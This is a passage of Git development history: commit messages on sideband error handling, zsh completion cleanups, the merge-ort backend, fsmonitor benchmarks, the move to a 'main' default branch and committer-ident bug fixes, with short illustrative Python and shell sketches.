packets).
But it would be nice to detect and report the error, since it's
likely to cause other confusion (we think the other side flushed,
but they did not).
- we try to detect packets missing their designator by checking for
"if (len < 1)". But this will never trigger for "len == 0"; we've
already detected that and left the function before then.
It _could_ detect a negative "len" parameter. But in that case, the
error message is wrong. The issue is not "no sideband" but rather
"eof while reading the packet". However, this can't actually be
triggered in practice, because neither of the two callers uses
pkt_read's GENTLE_ON_EOF flag. Which means they'd die with "the
remote end hung up unexpectedly" before we even get here.
So this truly is dead code.
We can improve these cases by passing in a pkt-line status to the
demultiplexer, and by having recv_sideband() use GENTLE_ON_EOF. This
gives us two improvements:
- we can now reliably detect flush packets, and will report a normal
packet missing its sideband designator as an error
- we'll report an eof with a more detailed "protocol error: eof while
reading sideband packet", rather than the generic "the remote end
hung up unexpectedly"
- when we see an eof, we'll flush the sideband scratch buffer, which
may provide some hints from the remote about why they hung up
(though note we already flush on newlines, so it's likely that most
such messages already made it through)
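To make the distinction concrete, here is a small Python sketch of a
demultiplexer that receives a read status alongside the payload. In
pkt-line framing the four hex digits count themselves, so "0000" is a
flush while "0004" is a data packet with an empty payload. The names
`PacketStatus`, `read_packet` and `demultiplex` are hypothetical, the
wording of the missing-designator error is illustrative, and other
special packet types are deliberately left out.

```python
import io
from enum import Enum


class PacketStatus(Enum):
    EOF = "eof"
    FLUSH = "flush"
    NORMAL = "normal"


def read_packet(stream):
    """Read one pkt-line and return (status, payload)."""
    header = stream.read(4)
    if len(header) < 4:
        return PacketStatus.EOF, b""
    length = int(header.decode("ascii"), 16)
    if length == 0:
        return PacketStatus.FLUSH, b""  # "0000" is a flush packet
    if length < 4:
        raise ValueError("special packet types are not handled in this sketch")
    return PacketStatus.NORMAL, stream.read(length - 4)  # "0004" yields b""


def demultiplex(status, payload):
    """Classify a packet using its status, not just its payload length."""
    if status is PacketStatus.EOF:
        return "protocol error: eof while reading sideband packet"
    if status is PacketStatus.FLUSH:
        return "flush"
    if not payload:
        return "protocol error: missing sideband designator"  # illustrative wording
    return f"band {payload[0]}: {payload[1:]!r}"


stream = io.BytesIO(b"0000" + b"0004" + b"0009\x01data")
results = [demultiplex(*read_packet(stream)) for _ in range(4)]
print(results)
```

Looking only at the payload length, the first two packets would be
indistinguishable; the status value is what separates them.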
In some sense this patch goes against fbd76cd450 (sideband: reverse its
dependency on pkt-line, 2019-01-16), which caused the sideband code not
to depend on the pkt-line code. But that commit was really just trying
to deal with the circular header dependency. The two modules are
conceptually interlinked, and it was just trying to keep things
compiling. And indeed, there's a sticking point in this patch: because
pkt-line.h includes sideband.h, we can't add the reverse include we need
for the sideband code to have an "enum packet_read_status" parameter.
Nor can we forward declare it, because you can't forward declare an enum
in C. However, C does guarantee that enums fit in an int, so we can just
use that type.
One alternative would be for the callers to check themselves that they
got something sane from the pkt-line code. But besides duplicating
logic, this gets quite tricky. Any error condition requires flushing the
sideband #2 scratch buffer, which only demultiplex_sideband() knows how
to do.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A lot of people are confused about which completion script they are
using: Zsh's Git script, or Git's Zsh script.
Add a simple helper so they can type 'git zsh<tab>' and find out if they
are running the correct one: this.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There's no need to use _alternative and repeat a lot of the code.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It's exactly the same as __gitcomp_nl(), no need to duplicate code.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of manually removing the suffix so zsh can add its own, we can
tell zsh to add no suffix, so we don't have to remove it.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We don't need to override IFS, zsh has a native way of splitting by new
lines: the expansion flag (f).
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We don't want to override the 'complete()' function in zsh, which can be
used by bashcomp.
Reported-by: Mark Lodato <lodato@google.com>
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This was introduced in upstream's bash script, but never in zsh's:
b221b5ab9b (completion: collapse extra --no-.. options)
It has been failing since v2.19.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It has been deprecated for more than eight years now, it's never up to
date, and it's a hassle to maintain.
It's time to move on.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A lot of people want to define aliases like gc='git commit', and zsh
allows that (when not using 'complete_aliases'), but we need to handle
services that call a function other than the main one.
With this patch we can do:
compdef _git gc=git_commit
Additionally, add compatibility for Zsh Git functions which have the
form git-commit (with dash, not underscore).
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We don't need PROMPT_COMMAND in Zsh; we are already using %F{color} %f,
which in turn use %{ and %}, which are the equivalent of Bash's
\[ and \].
We can use as many colors as we want and output directly into PS1
(or RPS1) without the risk of buffer wrapping issues.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Update the default locations of typical system bash-completion,
including the default bash-completion location for user scripts, and the
recommended way to find the system location (with pkg-config).
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git checkout" learned to use checkout.guess configuration variable
and enable/disable its "--[no-]guess" option accordingly.
* dl/checkout-guess:
checkout: learn to respect checkout.guess
Documentation/config/checkout: replace sq with backticks
"git checkout -p A...B [-- <path>]" did not work, even though the
same command without "-p" correctly used the merge-base between
commits A and B.
* dl/checkout-p-merge-base:
t2016: add a NEEDSWORK about the PERL prerequisite
add-patch: add NEEDSWORK about comparing commits
Doc: document "A...B" form for <tree-ish> in checkout and switch
builtin/checkout: fix `git checkout -p HEAD...` bug
"git clone" learned clone.defaultremotename configuration variable
to customize what nickname to use to call the remote the repository
was cloned from.
* sb/clone-origin:
clone: allow configurable default for `-o`/`--origin`
clone: read new remote name from remote_name instead of option_origin
clone: validate --origin option before use
refs: consolidate remote name validation
remote: add tests for add and rename with invalid names
clone: use more conventional config/option layering
clone: add tests for --template and some disallowed option pairs
"git push --force-with-lease[=<ref>]" can easily be misused to lose
commits unless the user takes good care of their own "git fetch".
A new option "--force-if-includes" attempts to ensure that what is
being force-pushed was created after examining the commit at the
tip of the remote ref that is about to be force-replaced.
* sk/force-if-includes:
t, doc: update tests, reference for "--force-if-includes"
push: parse and set flag for "--force-if-includes"
push: add reflog check for "--force-if-includes"
"git worktree list" now shows if each worktree is locked. This
may open the door to showing other kinds of states in the future.
* rs/worktree-list-show-locked:
worktree: teach `list` to annotate locked worktree
Use "git archive" more to produce the release tarball.
* rs/dist-doc-with-git-archive:
Makefile: remove the unused variable TAR_DIST_EXTRA_OPTS
Makefile: use git init/add/commit/archive for dist-doc
If we encounter an error while checking out an explicit path, we print a
message to stderr but do not actually exit with a non-zero code. While
this is a plumbing command and the behavior goes all the way back to
33db5f4d90 (Add a "checkout-cache" command which does what the name
suggests., 2005-04-09), this is almost certainly an oversight:
- we _do_ return an exit code from checkout_file(); the caller just
never reads it
- errors while checking out all paths (with "-a") do result in a
non-zero exit code.
- it would be quite unusual not to use the exit code for an error,
as otherwise the caller has no idea the command failed except by
scraping stderr
To keep our tests simple and portable, we can use the most obvious
error: asking to checkout a path which is not in the index at all.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If checkout-index is given --stage=all for a specific path, it will try
to write stages 1-3 (if present) for that path to temporary files.
However, if the file is present only at stage 0, it writes nothing but
gives a confusing message:
$ git checkout-index --stage=all -- Makefile
git checkout-index: Makefile does not exist at stage 4
This is nonsense. There is no stage 4 (it's just an internal enum value
we use for "all"), and the documentation clearly states:
Paths which only have a stage 0 entry will always be omitted from the
output.
Here it's talking about the list of tempfiles written to stdout, but it
seems clear that this case was not meant to be an error. We even have a
test which covers it, but it only checks that the command reports an
exit code of 0, not its stderr. And it reports 0 only because of another
bug which fails to propagate errors (which will be fixed in a subsequent
patch).
So let's make the test more thorough. We'll also cover the case that we
found _no_ entry, not even a stage zero, which should still be an error.
However, because of the other bug, we'll have to mark this as expecting
failure for the moment.
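The intended outcomes for a single path under --stage=all can be
summarized with a small decision function. This is a Python sketch of
the behavior described above, not the checkout-index implementation;
`stage_all_outcome` and its return values are hypothetical.

```python
def stage_all_outcome(index_stages):
    """Decide what --stage=all should do for one path.

    index_stages is the set of stage numbers the index holds for the path.
    """
    higher = sorted(s for s in index_stages if s in (1, 2, 3))
    if higher:
        return ("write", higher)  # write a tempfile for each stage present
    if 0 in index_stages:
        return ("omit", [])       # stage 0 only: silently left out
    return ("error", [])          # no entry at all is still an error


print(stage_all_outcome({1, 3}))
print(stage_all_outcome({0}))
print(stage_all_outcome(set()))
```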
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We pass "sideband: " as our identity for errors to recv_sideband(). But
it already adds the trailing colon and space. This doesn't invalidate
any tests, but it looks funny when you examine the test output.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the exit code for the likes of "git remote add/rename" to exit
with 2 if the remote in question doesn't exist, and 3 if it
does. Before we'd just die() and exit with the general 128 exit code.
This changes the output message from e.g.:
fatal: remote origin already exists.
To:
error: remote origin already exists.
Which I believe is a feature, since we generally use "fatal" for the
generic errors, and "error" for the more specific ones with a custom
exit code, but this part of the change may break code that already
relies on stderr parsing (not that we ever supported that...).
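With distinct exit codes, a caller can branch on the return code instead
of scraping stderr. A rough Python sketch follows; `classify_remote_exit`
and `add_remote` are hypothetical helpers, and only the codes 0, 2 and 3
described above are given a specific meaning.

```python
import subprocess

REMOTE_NOT_FOUND = 2  # the remote in question doesn't exist
REMOTE_EXISTS = 3     # the remote in question already exists


def classify_remote_exit(returncode):
    """Map an exit code from "git remote add/rename" to a coarse outcome."""
    if returncode == 0:
        return "ok"
    if returncode == REMOTE_NOT_FOUND:
        return "missing"
    if returncode == REMOTE_EXISTS:
        return "exists"
    return "other-failure"  # e.g. the general 128 from die()


def add_remote(name, url, cwd="."):
    """Run "git remote add" and classify the result without reading stderr."""
    proc = subprocess.run(
        ["git", "remote", "add", name, url],
        cwd=cwd, capture_output=True, text=True,
    )
    return classify_remote_exit(proc.returncode)
```

A caller that wants "add if missing" semantics could treat "exists" as
success, subject to the race discussed in this message.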
The motivation for this is a discussion around some code in GitLab's
gitaly which wanted to check this, and had to parse stderr to do so:
https://gitlab.com/gitlab-org/gitaly/-/merge_requests/2695
It's worth noting as an aside that a method of checking this that
doesn't rely on that is to check with "git config" whether the value
in question does or doesn't exist. That introduces a TOCTOU race
condition, but on the other hand this code (e.g. "git remote add")
already has a TOCTOU race.
We go through the config.lock for the actual setting of the config,
but the pseudocode logic is:
read_config();
check_config_and_arg_sanity();
save_config();
So e.g. if a sleep() is added right after the remote_is_configured()
check in add() we'll clobber remote.NAME.url, and add another (usually
duplicate) remote.NAME.fetch entry (and other values, depending on
invocation).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There are a few differences between the new API in merge-ort and the old
API in merge-recursive. While the new API is more flexible, it might
feel like more work at times than the old API. merge-ort-wrappers
creates two convenience wrappers taking the exact same arguments as the
old merge_trees() and merge_recursive() functions and implements them
via the new API. This makes converting existing callsites easier, and
serves to highlight some of the differences in the API.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is the beginning of a new merge strategy. While there are some API
differences, and the implementation has some differences in behavior, it
is essentially meant as an eventual drop-in replacement for
merge-recursive.c. However, it is being built to exist side-by-side
with merge-recursive so that we have plenty of time to find out how
those differences pan out in the real world while people can still fall
back to merge-recursive. (Also, I intend to avoid modifying
merge-recursive during this process, to keep it stable.)
The primary difference noticeable here is that the updating of the
working tree and index is not done simultaneously with the merge
algorithm, but is a separate post-processing step. The new API is
designed so that one can do repeated merges (e.g. during a rebase or
cherry-pick) and only update the index and working tree one time at the
end instead of updating it with every intermediate result. Also, one
can perform a merge between two branches, neither of which match the
index or the working tree, without clobbering the index or working tree.
The next three commits will demonstrate various uses of this new API.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This benchmark covers the git status time for a heavily
dirty directory, benchmarking fsmonitor's refresh.
Comparing our perl hook with rs-git-fsmonitor, we see that
the perl script incurs significant overhead, which is further
motivation to provide a faster implementation within git.
7519.7: status (dirty) (fsmonitor=query-watchman) 10.05(7.78+1.56)
7519.20: status (dirty) (fsmonitor=rs-git-fsmonitor) 6.72(4.37+1.64)
7519.33: status (dirty) (fsmonitor=disabled) 5.62(4.24+2.03)
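As a quick worked comparison of the three timings above, the relative
cost of each hook can be computed against the fsmonitor=disabled run.
The sketch below is Python and reads the first number on each line as
elapsed seconds, which is an assumption about the perf output format;
`overhead_percent` is a hypothetical helper.

```python
# First number from each result line above, taken as elapsed seconds.
timings = {
    "query-watchman": 10.05,
    "rs-git-fsmonitor": 6.72,
    "disabled": 5.62,
}


def overhead_percent(hook, baseline="disabled"):
    """Extra time relative to the baseline, as a percentage."""
    base = timings[baseline]
    return 100.0 * (timings[hook] - base) / base


for hook in ("query-watchman", "rs-git-fsmonitor"):
    print(f"{hook}: {overhead_percent(hook):.0f}% slower than fsmonitor=disabled")
```

On these numbers the perl hook is roughly 79% slower than running with
fsmonitor disabled, against roughly 20% for rs-git-fsmonitor.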
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This prepares for it being called multiple times when
testing different hooks
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is extremely verbose, printing >10K non-useful lines
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The full name is lengthy and makes it hard to read
Before:
7519.3: status (fsmonitor=/home/nipunn/src/server/.git/hooks/rs-git-fsmonitor) 0.02(0.01+0.00)
After:
7519.3: status (fsmonitor=rs-git-fsmonitor) 0.03(0.02+0.00)
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There was much duplication here. Prepares for making
changes to the description.
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Previously, it would silently run the perf suite without using
fsmonitor, because fsmonitor errors are not hard failures.
Now it errors loudly.
GIT_PERF_7519_FSMONITOR="$HOME/rs-git-fsmonitorr"
./p7519-fsmonitor.sh -i -v
fatal: cannot run /home/nipunn/rs-git-fsmonitorr:
No such file or directory
not ok 2 - setup for fsmonitor
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is only required to be set up once. This prepares for
testing multiple hooks in one invocation.
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for testing multiple fsmonitor hooks
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Start with the most important thing: the proper location of this script,
then follow with the location of the slave script (git-completion.bash).
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 0e5ed7cca3 wrongly changed the extension of the bash script
to .zsh; the zstyle configuration is for the slave script (bash), not
the master one (zsh).
For example it could be:
zstyle ':completion:*:**' script ~/.git-completion.bash
The extension doesn't really matter, but it confuses people into
thinking it's a zsh script; it's not.
Cc: Peter van der Does <peter@avirtualhome.com>
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Many callers append a space suffix, but zsh automatically appends a
space, making the completion add two spaces, for example:
git log ma<tab>
Will complete 'master '.
Let's remove that extra space.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As in the previous commit, the "recursive" backend relies on
unpack_trees() to check if unstaged or untracked files would be
overwritten by a merge, but unpack_trees() does not understand renames,
so it has false positives and false negatives. Once it has run, since
it updates as it goes, merge-recursive then has to handle completing the
merge as best it can despite extra changes in the working copy.
However, this is not just an issue for dirty files, but also for
untracked files because directory renames can cause file contents to
need to be written to a location that was not tracked on either side of
history.
Since the "ort" backend does the complete merge in memory, and only
updates the index and working copy as a post-processing step, if there
are untracked files in the way it can simply abort the merge much like
checkout does.
Update t6423 to reflect the better merge abilities and expectations for
ort, while still leaving the best-case-as-good-as-recursive-can-do
expectations there for the recursive backend so we retain its stability
until we are ready to deprecate and remove it.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "recursive" backend relies on unpack_trees() to check if unstaged
changes would be overwritten by a merge, but unpack_trees() does not
understand renames -- and once it returns, it has already written many
updates to the working tree and index. As such, "recursive" had to do a
special 4-way merge in which it also treated the working copy as an
extra source of differences that it had to carefully avoid overwriting,
which resulted in moving files to new locations to avoid conflicts.
The "ort" backend, by contrast, does the complete merge in memory, and
only updates the index and working copy as a post-processing step. If
there are dirty files in the way, it can simply abort the merge.
Update t6423 and t6436 to reflect the better merge abilities and
expectations we have for ort, while still leaving the
best-case-as-good-as-recursive-can-do expectations there for the
recursive backend so we retain its stability until we are ready to
deprecate and remove it.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The ort merge strategy has some slight differences in commit
descriptions (shortened hashes), stdout vs stderr, and in conflict
messages. Also, builtin/merge.c reports usage of "ort" as "Merge made
by the 'ort' strategy" -- while it is meant as a drop in replacement for
"recursive" it is not yet treated as though it is recursive. Update the
testcases to expect different output for the different merge backends.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Conflict markers carry an extra annotation of the form
REF-OR-COMMIT:FILENAME
to help distinguish where the content is coming from, with the :FILENAME
piece being left off if it is the same for both sides of history (thus
only renames with content conflicts carry that part of the annotation).
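The annotation rule can be written down as a tiny function. This is a
Python sketch of the rule as stated above, not code from either merge
backend; `conflict_labels` is a hypothetical name.

```python
def conflict_labels(ours_ref, ours_path, theirs_ref, theirs_path):
    """Return the annotations for the two sides of a conflict.

    The ":FILENAME" part is only added when the two sides disagree on the
    path, i.e. for renames with content conflicts.
    """
    if ours_path == theirs_path:
        return ours_ref, theirs_ref
    return f"{ours_ref}:{ours_path}", f"{theirs_ref}:{theirs_path}"


print(conflict_labels("HEAD", "file.c", "topic", "file.c"))
print(conflict_labels("HEAD", "new.c", "topic", "old.c"))
```

Keeping the rule in one place is what avoids the accidental omissions
mentioned below, where each special-case code path had its own copy.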
However, there were cases where the :FILENAME annotation was
accidentally left off, due to merge-recursive's
every-codepath-needs-a-copy-of-all-special-case-code format.
Update a few tests to have the correct :FILENAME extension on relevant
paths with the ort backend, while leaving the expectation for
merge-recursive the same to avoid destabilizing it.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a file is renamed and has content conflicts, merge-recursive does
not have some stages for the old filename and some stages for the new
filename in the index; instead it copies all the stages corresponding to
the old filename over to the corresponding locations for the new
filename, so that there are three higher order stages all corresponding
to the new filename. Doing things this way makes it easier for the user
to access the different versions and to resolve the conflict (no need to
manually 'git rm' the old version as well as 'git add' the new one).
rename/deletes should be handled similarly -- there should be two stages
for the renamed file rather than just one. We do not want to
destabilize merge-recursive right now, so instead update relevant tests
to have different expectations depending on whether the "recursive" or
"ort" merge strategies are in use.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When files are renamed and modified, we need to do three-way content
merges to get the appropriate content in the right location. When we
have a rename/rename(1to2) conflict (both sides rename the same file,
but differently), that merged content should be placed in each of the
two resulting files. merge-recursive handled that fine when that was
all that was involved, but when one or more of the two resulting files
were ALSO involved in a directory/file conflict, it failed to propagate
the merged content to that file. Unfortunately, the one test in t6416
that touched on this combination of cases had been coded to not expect
the merged contents to be present.
Fix the test to check for the right behavior, and record how the
different merge backends will be expected to handle it.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
merge-recursive.c is built on the idea of running unpack_trees() and
then "doing minor touch-ups" to get the result. Unfortunately,
unpack_trees() was run in an update-as-it-goes mode, leading
merge-recursive.c to follow suit and end up with an immediate evaluation
and fix-it-up-as-you-go design. Some things like directory/file
conflicts are not well representable in the index data structure, and
required special extra code to handle. But then when it was discovered
that rename/delete conflicts could also be involved in directory/file
conflicts, the special directory/file conflict handling code had to be
copied to the rename/delete codepath. ...and then it had to be copied
for modify/delete, and for rename/rename(1to2) conflicts, ...and yet it
still missed some. Further, when it was discovered that there were also
file/submodule conflicts and submodule/directory conflicts, we needed to
copy the special submodule handling code to all the special cases
throughout the codebase.
And then it was discovered that our handling of directory/file conflicts
was suboptimal because it would create untracked files to store the
contents of the conflicting file, which would not be cleaned up if
someone were to run a 'git merge --abort' or 'git rebase --abort'. It
was also difficult or scary to try to add or remove the index entries
corresponding to these files given the directory/file conflict in the
index. But changing merge-recursive.c to handle these correctly was a
royal pain because there were so many sites in the code with similar but
not identical code for handling directory/file/submodule conflicts that
would all need to be updated.
I have worked hard to push all directory/file/submodule conflict
handling in merge-ort through a single codepath, and avoid creating
untracked files for storing tracked content (it does record things at
alternate paths, but makes sure they have higher-order stages in the
index).
Since updating merge-recursive is too much work and we don't want to
destabilize it, instead update the testsuite to have different
expectations for relevant directory/file/submodule conflict tests.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There are a number of tests that the "recursive" backend does not handle
correctly but which the redesign in "ort" will. Add a new helper in
lib-merge.sh for selecting a different test expectation based on the
setting of GIT_TEST_MERGE_ALGORITHM, and use it in various testcases to
document which ones we expect to fail under recursive but pass under
ort.
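The selection such a helper performs might look roughly like the sketch below. The name pick_expectation is hypothetical, and the sketch only echoes the chosen expectation instead of wrapping the test framework; any value other than "ort" is treated as recursive here, which is an assumption of this example.

```shell
# Hypothetical sketch: choose an expectation based on the merge backend.
# $1 = expected status under recursive, $2 = expected status under ort.
pick_expectation () {
	status_for_recursive=$1
	status_for_ort=$2
	if test "${GIT_TEST_MERGE_ALGORITHM-}" = ort
	then
		echo "$status_for_ort"
	else
		echo "$status_for_recursive"
	fi
}
```

A testcase that recursive gets wrong but ort handles would then call it with "failure success".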
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For the --committer-date-is-author-date option of git-am and git-rebase,
we format the committer ident, then re-parse it to find the name and
email, and then feed those back to fmt_ident().
We can simplify this by handling it all at the time of the fmt_ident()
call. We pass in the appropriate getenv() results, and if they're not
present, then our WANT_COMMITTER_IDENT flag tells fmt_ident() to fill in
the appropriate value from the config. Which is exactly what
git_committer_ident() was doing under the hood.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In addition to the trivial search-and-replace, there are three
non-trivial adjustments necessary.
Mark the respective test cases with the transitional prereq and make
those non-trivial adjustments early, to make this change easier to
review.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In some tests, the default branch name is part of aligned output. As we
want to change the default branch name to `main`, which is two
characters shorter than the old default branch name, we will have to
adjust those tests.
Since we use the original default branch name until the entire test
suite has been adjusted accordingly, the touched test cases need to be
guarded by a prereq (that is so far disabled so that they are skipped
for now).
The test cases that depend on those test cases that are newly guarded by
that prereq naturally have to be guarded, too.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We need to adjust a test that uses a prefix of the default branch name,
to accommodate `main` being used soon.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the test case adjusted by this patch, we want to cut just after the
longest shown ref name. Since `main` is shorter than `master`, we need
to decrease the number of characters. Since `topic` is shown, too, and
since that is only one character shorter than `master`, we decrement the
length by one instead of two.
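The arithmetic can be checked with a small sketch. The helper name longest_len is hypothetical; it only computes the length of the longest name it is given.

```shell
# Hypothetical sketch: print the length of the longest ref name given.
longest_len () {
	max=0
	for name in "$@"
	do
		if test ${#name} -gt $max
		then
			max=${#name}
		fi
	done
	echo $max
}
```

With `master` and `topic` shown, the longest name has six characters; with `main` and `topic` shown, `topic` becomes the longest at five, so the cut position moves by one rather than two.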
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We want to rename the default branch name used by `git init` in the near
future, using `main` as the new name.
In preparation for that, we adjust a test case that wants to rename the
default branch to a different name that nevertheless has the same length.
We use `none` as that name because it matches the length of `main`.
As this test case cannot possibly pass until the default branch name is
_actually_ changed, we temporarily guard it behind a special-purpose
prereq, until the test suite is fully converted to use that new default
branch name.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation to running t6200 with the default branch name set to
"main", let's adjust the only non-trivial aspect thereof. The rest will
be done via a trivial `sed` invocation.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To allow for an incremental conversion to a new default main branch
name, let's introduce `GIT_TEST_DEFAULT_MAIN_BRANCH_NAME`. This
environment variable can be set at the top of each converted test
script, overriding the default main branch name to use when initializing
new repositories (or cloning empty repositories).
Note: the `GIT_TEST_DEFAULT_MAIN_BRANCH_NAME` is _not_ intended to be
used manually; many tests require a specific main branch name and cannot
simply work with another one. This `GIT_TEST_*` variable is meant purely
for the transitional period while the entire test suite is converted to
use `main` as the initial branch name by default.
We also introduce the `PREPARE_FOR_MAIN_BRANCH` prereq that determines
whether the default main branch name is `main`, and adjust a couple of
test functions to use it. This prereq will be used to temporarily
disable a couple test cases to allow for adjusting the test script
incrementally. Once an entire test is adjusted, we will adjust the test
so that it is run with `GIT_TEST_DEFAULT_MAIN_BRANCH_NAME=main`.
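The gating described above could be pictured roughly as follows. Both function names are hypothetical stand-ins for this example; the real prereq is registered with the test framework rather than implemented as a free-standing function.

```shell
# Hypothetical sketch: does the transitional variable select `main`?
default_branch_is_main () {
	test "${GIT_TEST_DEFAULT_MAIN_BRANCH_NAME-}" = main
}

# Hypothetical sketch: report whether a guarded test case would run.
run_if_main () {
	title=$1
	if default_branch_is_main
	then
		echo "run: $title"
	else
		echo "skip: $title (missing PREPARE_FOR_MAIN_BRANCH)"
	fi
}
```

Until a script sets the variable to `main` at its top, guarded test cases are reported as skipped in this sketch.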
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Seeing as we want to use `main` as the new default branch name used by
`git init`, and that `main` is used as directory name in t9801, let's
tighten the rev-list arguments to make it explicit when we are referring
to a ref instead of a directory.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for changing the default branch name to `main`, let's
skip the suffix "into main" in merge commit messages, the same way that
"into master" has been skipped by default.
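A simplified sketch of the resulting behavior, assuming a single merged branch; the function merge_title is hypothetical and much simpler than the real message formatting code.

```shell
# Hypothetical sketch: title of a merge commit message.
# $1 = branch being merged, $2 = branch being merged into.
merge_title () {
	merged=$1 current=$2
	case $current in
	master|main)
		# The "into <branch>" suffix is skipped for these names.
		printf "Merge branch '%s'\n" "$merged"
		;;
	*)
		printf "Merge branch '%s' into %s\n" "$merged" "$current"
		;;
	esac
}
```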
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 7573cec52c (rebase -i: support --committer-date-is-author-date,
2020-08-17) copied the committer ident-parsing code from builtin/am.c.
And in doing so, it copied a bug in which we always set the email to an
empty string. We fixed the version in git-am in the previous commit;
this commit fixes the copied code.
Reported-by: VenomVendor <info@venomvendor.com>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit e8cbe2118a (am: stop exporting GIT_COMMITTER_DATE, 2020-08-17)
rewrote the code for setting the committer date to use fmt_ident(),
rather than setting an environment variable and letting commit_tree()
handle it. But it introduced two bugs:
  - we use the author email string instead of the committer email

  - when parsing the committer ident, we used the wrong variable to
    compute the length of the email, resulting in it always being a
    zero-length string
This commit fixes both, which causes our test of this option via the
rebase "apply" backend to now succeed.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After running "rebase --committer-date-is-author-date", we confirm that
the committer date is the same as the author date. However, we don't
look at any other parts of the committer ident line to make sure we
didn't screw them up. And indeed, there are a few bugs here. Depending
on the rebase backend in use, we may accidentally use the author email
instead of the committer's, or even an empty string.
Let's teach our test_ctime_is_atime helper to check the committer name
and email, which reveals several failing tests.
